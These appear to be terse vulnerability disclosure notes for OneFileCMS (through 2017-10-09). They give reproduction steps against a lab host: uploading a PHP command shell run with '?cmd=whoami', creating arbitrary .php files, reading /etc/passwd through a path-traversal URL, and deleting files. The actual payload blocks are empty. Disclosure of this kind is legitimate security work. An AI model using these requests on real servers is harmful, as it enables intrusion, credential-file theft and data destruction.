havysec
havysec
http://fragrant:30001/OneFileCMS/onefilecms.php use username and password login the page Click "Upload FIle"  upload cmd.php http://fragrant:30001/OneFileCMS/qqqcmd.php?cmd=whoami 
http://fragrant:30001/OneFileCMS/onefilecms.php use username and password login the page type New filename '123.php' click Create  123.php created successfully.  click 123.php write below ``` ``` click save  123.php saved...

onefilecms.php in OneFileCMS through 2017-10-09 might allow attackers to access some secret file like passwd access `http://fragrant:30001/OneFileCMS/onefilecms.php?i=etc/&f=passwd&p=raw_view` 
access http://fragrant:30001/OneFileCMS/onefilecms.php by username/password  access http://fragrant:30001/OneFileCMS/onefilecms.php?i=var/www/html/&f=123.php&p=edit&p=deletefile  Click `Delete File(s)` 
access http://fragrant:30001/OneFileCMS/onefilecms.php by username/password  Click `Upload File` -> abc.php -> `Browse` -> select abc.php -> Click `Upload`   access http://fragrant:30001/abc.php 
onefilecms.php in OneFileCMS through 2017-10-09 might allow attackers to execute arbitrary PHP code via xxx .php filename on the New File screen access http://fragrant:30001/OneFileCMS/onefilecms.php by username/password  Click `New File`...